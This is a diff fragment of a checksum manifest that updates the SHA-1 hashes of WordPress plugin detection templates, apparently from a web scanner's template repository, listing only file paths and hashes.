-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:bc240b504f0a4aceb2849571af7492617bdf834e -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:a9b69ca4ae978bfd43c6c821b32e3f843e0f8776 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9951346f8422f87f8b8a3b80a94acc9d2c81dd8b -http/technologies/wordpress/plugins/amp.yaml:fd939994d2d87e2ce8eef788f173f6131fa249ee -http/technologies/wordpress/plugins/antispam-bee.yaml:eb7a1e66a357e2c4ab775ff8a04eb219c4166a59 -http/technologies/wordpress/plugins/astra-sites.yaml:9382940786fcffd8b32facf33ce8c657fa8d2aab +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:8b918520f744ba9038601c02231960b972c71efd -http/technologies/wordpress/plugins/backwpup.yaml:04588be1fee38fb9bfafd38f7d1e92ddb7fbb2e4 -http/technologies/wordpress/plugins/better-search-replace.yaml:5fda8914eac1f6815eadce73ca14a0926bf82e65 -http/technologies/wordpress/plugins/better-wp-security.yaml:c99e7aa5417ab0f6efcb25b2a890637443f1019a -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:318923e32ed8087dbbeddd3eb17a0f79d8150a3c -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1896cecb20ab67eda53577320fe65d2f0152c0e3 -http/technologies/wordpress/plugins/breeze.yaml:2139a93b1a869f50bfa94b8b9288c4f91d9ffaee -http/technologies/wordpress/plugins/broken-link-checker.yaml:d39bdda5ce4e3de4eb6655c66884fb00bde59957 -http/technologies/wordpress/plugins/chaty.yaml:5641745d9d69704ff6b23a5c04ab125c2828a093 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:db4edf74fa04c632509042848f0e2c6c7c83727f -http/technologies/wordpress/plugins/classic-editor.yaml:c97fcf64adcfe4150f2147d352283ac95fe62372 -http/technologies/wordpress/plugins/classic-widgets.yaml:4a46d05269668dcd69b5e63de31d80c7ea9407c9 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9c859d60be12b640ebae97a8fd5f510e5db255b7 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:fcf545666e70a797acd9f9917c677739e17f93e3 -http/technologies/wordpress/plugins/coblocks.yaml:250de7b5952af0015df6b7f92e3c9040e926d713 -http/technologies/wordpress/plugins/code-snippets.yaml:6756ccb8fb88363e32ce872170b0bb7a45538b8c -http/technologies/wordpress/plugins/coming-soon.yaml:b8abc9c2e81a6226343541105d1e1229294d6273 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:8d3b3fedf2dfa5114c811333ea6ff06b2154f324 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:75804880ff95d84dc45f3ba68b83bae0983b6fac -http/technologies/wordpress/plugins/contact-form-7.yaml:ca1b3ee27b69de64d8d0401ca36c4ec4109b506f -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:b1bcd3c24febf4e5f8dc02cbd0b33c699694a623 -http/technologies/wordpress/plugins/cookie-law-info.yaml:739ea86438b4978ca385e876702e415cd0cb8616 -http/technologies/wordpress/plugins/cookie-notice.yaml:98a8d7d1191f039c3c3ab2f63cb1cdba21a9917c -http/technologies/wordpress/plugins/copy-delete-posts.yaml:6a686fd9f493edbcffb8b70a17f28834ee370629 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:c56aa06d9c23f93f7b96deb8bcb72e40c968f0dd -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:fa9cc7967075d7030479ee702a9966c5a5298879 -http/technologies/wordpress/plugins/custom-css-js.yaml:d6b8795c280d0463bf77bb567b57ff7bd2082a1b -http/technologies/wordpress/plugins/custom-fonts.yaml:4ea2b09a579124b24d372da9de3a13bbf7d1f0a0 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:4b20f86726ea435d9883a4bd47d833cc5ecbdecb -http/technologies/wordpress/plugins/disable-comments.yaml:dd97025ac4d4e1acd147626fb49883644a51186b -http/technologies/wordpress/plugins/disable-gutenberg.yaml:aebfb96825c1cc43513d2fe8da0aa82c2ae03b75 -http/technologies/wordpress/plugins/duplicate-page.yaml:b02348aa08ad2dcaeee5c80e7d0019c7b3beebe9 -http/technologies/wordpress/plugins/duplicate-post.yaml:9eb479ae5b793cb54f07027101b2a7704baf33c3 -http/technologies/wordpress/plugins/duplicator.yaml:372a61b91bc1610dcdb82f0b2fff737353b65d86 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:51ea4e6cf32be1bd196b105d3eca513c1b6dbe1e +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:fe2dde3e1e31c53c8223254961648d5ed931522d -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:075bd8102ca5188820b94afbaf2b8a1201fdbf29 -http/technologies/wordpress/plugins/elementor.yaml:6e7e05db5399c60ac14c4c0fb78a0ca56b478cc3 -http/technologies/wordpress/plugins/elementskit-lite.yaml:be1886ff7470e6f1cbb2d12238d885fabb87c897 -http/technologies/wordpress/plugins/enable-media-replace.yaml:2bead0dbfdff25fbd1a24f5014fdf7057951d145 -http/technologies/wordpress/plugins/envato-elements.yaml:38364bf0be511b8c4c945d69a01373c23ad0e219 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e15e34b404c733018a953111ff81217623de65cf -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:458474ffeb716aa0e1241f742c488e04f703c7b9 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:ad6a8a47fda824bba10ed3c3632aa15d25edbdd8 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:a2806dd482fc72973c495c2bd8f56348f4996a49 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:d48c8b02a8161eb8d52f4731571981c53b18e52c -http/technologies/wordpress/plugins/flamingo.yaml:8ed7521665fa94c39622e1ce824f7b3bb43bc20f -http/technologies/wordpress/plugins/fluentform.yaml:1bb4628b30880129553c173234110f71a5957dbe -http/technologies/wordpress/plugins/font-awesome.yaml:9aa4a2d9da4da66f212b2a71fff3075efc1cbf16 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:0eff62db08ff03925c8d58eb3db66077f15e15d7 -http/technologies/wordpress/plugins/formidable.yaml:4435d6b45b966e35fd99cd0cc0ac12ec32b80237 -http/technologies/wordpress/plugins/forminator.yaml:31f9393ff382205842592f302afce9db00cb8d6d -http/technologies/wordpress/plugins/ga-google-analytics.yaml:240998275836f73bd28c27c8b0673145d9a7edf9 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:2ff05171abb920faedc74ce69eb14b32be6dc52a -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:da15d27c39d32c34b8f748b594be147742746d02 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:ae7c709aa2965dcdbbb2d18a9aa23a502462e395 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:a1a173d93c142561b5159cbd8702e0cf71d6dba8 -http/technologies/wordpress/plugins/google-site-kit.yaml:46fd9d0c9c53c369ba6b76526ba3eb8701f0dc90 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:17494bd5d3051f9bebc7009f0b824fcb929a191a -http/technologies/wordpress/plugins/gtranslate.yaml:38297c99d4ea85d147fb80949f550d47f9acf1b5 -http/technologies/wordpress/plugins/gutenberg.yaml:f5c515466dd36c94b6709a4403a45b236fee1086 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:f47377e266de5ca569da91bcd7e9b0489e8ed1c3 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:0905c24fdafd9ede56836798e6adf0acb7fe6431 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:2d580e2272e4725bef6ed17f97174ec4723ed4c0 -http/technologies/wordpress/plugins/header-footer.yaml:59c40ede2b09a70d453561c9eb7d312ba433db64 -http/technologies/wordpress/plugins/health-check.yaml:d1b052f1440eba33ff24475d8630ee05cd5698ed -http/technologies/wordpress/plugins/hello-dolly.yaml:5cd7110e528d0266f715d2e37a053d4c0dceaae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:34ab4a38089be01659818c7a772a6e8c49fc07f9 -http/technologies/wordpress/plugins/hostinger.yaml:738a4822dc85c4cbfa16abecf7e7aa7fca7947da -http/technologies/wordpress/plugins/image-optimization.yaml:b6f56ef0b3479c348fdf59f404b6ccde1222d9d1 -http/technologies/wordpress/plugins/imagify.yaml:ab3a990c930132babb8b8dc954a49830e5fb1f51 -http/technologies/wordpress/plugins/imsanity.yaml:79d4225f6ae9952e2e30924046c894d6339e8607 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:660231b8587c54c250b8c52de6db2090155f3020 -http/technologies/wordpress/plugins/instagram-feed.yaml:1cef4f05ec2e90e777be6786d5997945b4d17a04 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:ce6103d4a8ffed36f1c511a04d91abb0a874660a +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:ce0a9386ce77242b4cf39c6858f95677af19f0bc -http/technologies/wordpress/plugins/jetpack.yaml:e7f880e81a152bd811e47a249257a3da12934226 -http/technologies/wordpress/plugins/kadence-blocks.yaml:28a4aeb52ce276e37ed019e08a0586ad8ac745b0 -http/technologies/wordpress/plugins/kirki.yaml:4a67b85a895dd12a3a39d036049967acbbba3aaf -http/technologies/wordpress/plugins/leadin.yaml:ea2ae1745f6d25ed7fa1b17b1e05e2e8f2e4ee0f -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:e30821097019fd3485bdae2b49d941f6b0112303 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:eeac4a934aa5ecbcb688b4483f329c422b81efdb -http/technologies/wordpress/plugins/litespeed-cache.yaml:b76dd4e1fbe8b6243002fc6346faeb2087af132f -http/technologies/wordpress/plugins/loco-translate.yaml:da0ab93678c2badc7d7d58c4747673beb4b058ee -http/technologies/wordpress/plugins/loginizer.yaml:ab846f66e9d3110d396381a57170bf1a7ae02dc9 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:4dfc487b0e5392b09649cd30b2493f3b07200614 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:a8218690909e22ba50d3c3bb01dcd602752fb017 -http/technologies/wordpress/plugins/mailpoet.yaml:28cb91f994c45e010cb74eaa56d9641817316756 -http/technologies/wordpress/plugins/maintenance.yaml:902a9ada614788755becfbbe4f7fe6080f206b53 -http/technologies/wordpress/plugins/mainwp-child.yaml:f2cd22978291b12a2676a27cdbe70ca3c430df32 -http/technologies/wordpress/plugins/malcare-security.yaml:85cb20f894c09b93ab22f0e01afc829de10153ed -http/technologies/wordpress/plugins/megamenu.yaml:746e599a620836f112a0db6c62ae160e03607487 -http/technologies/wordpress/plugins/members.yaml:f64688a4f2a030aac12daa69168e27a4ee685e01 -http/technologies/wordpress/plugins/meta-box.yaml:2b385d894ecf9499a2552a981d8a3653afd71042 -http/technologies/wordpress/plugins/metform.yaml:d277327a6e5f418509e1a9ab908a645e9e18f9ec -http/technologies/wordpress/plugins/ml-slider.yaml:df8732c05d794bdf9cf68278aa57c22b12fd01e3 -http/technologies/wordpress/plugins/newsletter.yaml:7e3b17537060eb846ed8a3ed4d48f06b76aff23c -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:89b07f28d48c5a1f6c50979c5abd5126b9b22a64 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:48c74bbba5b63c5491b5e550591f8c53475ef8a6 -http/technologies/wordpress/plugins/ninja-forms.yaml:633eff30d6e15dd5476da01f6af1bf61a10c2867 -http/technologies/wordpress/plugins/ocean-extra.yaml:ad7e5b754993262dca6f1d0f0bc4b4018aa73e67 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:d3ddb5302d31eb9acd06ee56a34c97224c0d872c -http/technologies/wordpress/plugins/one-click-demo-import.yaml:92445150d72a74263021d9f60654d1bf034dc7af -http/technologies/wordpress/plugins/optinmonster.yaml:eafa2544ef62f9c41359cd60030e2328be3ed8b6 -http/technologies/wordpress/plugins/otter-blocks.yaml:c5f11a44dca3ced020e0f779907ad8cac4998159 -http/technologies/wordpress/plugins/password-protected.yaml:66b99b679473e95e31156abed0a2de1c0035915f -http/technologies/wordpress/plugins/pdf-embedder.yaml:c5a801acb0cebf288454dd678d4d270072b36fe3 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c2e1f55ac5b739a0968963a71d96a16a1bf37cf4 -http/technologies/wordpress/plugins/pixelyoursite.yaml:4029347b3e6d591ad586158a5cb2d380238d841d -http/technologies/wordpress/plugins/polylang.yaml:785392ece54c9e0066818738bc5f935036d1f54f +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:5665e7ce8b52b53fb3f5d70bc70f103788fcf015 -http/technologies/wordpress/plugins/post-smtp.yaml:8c8de40f27df836ca49b07a6b52fb562b901697a -http/technologies/wordpress/plugins/post-types-order.yaml:bebc1009dfe05938e1f07d83000eca491aaafffd -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ef73b88f5c0a4de512ece0478fd15b33d0fe1804 -http/technologies/wordpress/plugins/pretty-link.yaml:73a08fa9cf19a2132736ca1d3bd5cb3833488f59 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:d072a1050f83d49cf8470a896bc529928566763f -http/technologies/wordpress/plugins/really-simple-ssl.yaml:ccbe8704ec9a91af4d67fa22cddebf3786200476 -http/technologies/wordpress/plugins/redirection.yaml:46130e242d58b77ac3416762d0fefa8eef101c26 -http/technologies/wordpress/plugins/redux-framework.yaml:6a2bc05f42e04cd8a9a3cef725ec583038b428c7 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:1703bf8f1384341ef39935c5aea629d751cdc4d0 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:44e0c4934b988d10749ae8522d884720d73b4903 -http/technologies/wordpress/plugins/safe-svg.yaml:72143fa7c360a9bdc1e7c36541ecdf42a1d08249 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:53500071cd2dd3d23f765052dbac36ae4072ad96 -http/technologies/wordpress/plugins/sg-cachepress.yaml:6e9c22b46100398d4afeefb4547997b949bc1872 -http/technologies/wordpress/plugins/sg-security.yaml:5071e961bf563fddf08a8f1c8299e8c6a1ebd88e -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c5758d094a85cda07965185888b5945b017ea988 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:0a305b97a7ee5d06fdb92e16e06b1806575fe8e6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:2675607438dd59a4880d7ea30ed478360431be7e -http/technologies/wordpress/plugins/simple-history.yaml:b56ec16bdda3454dcf466867e2eb5478e10227d0 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 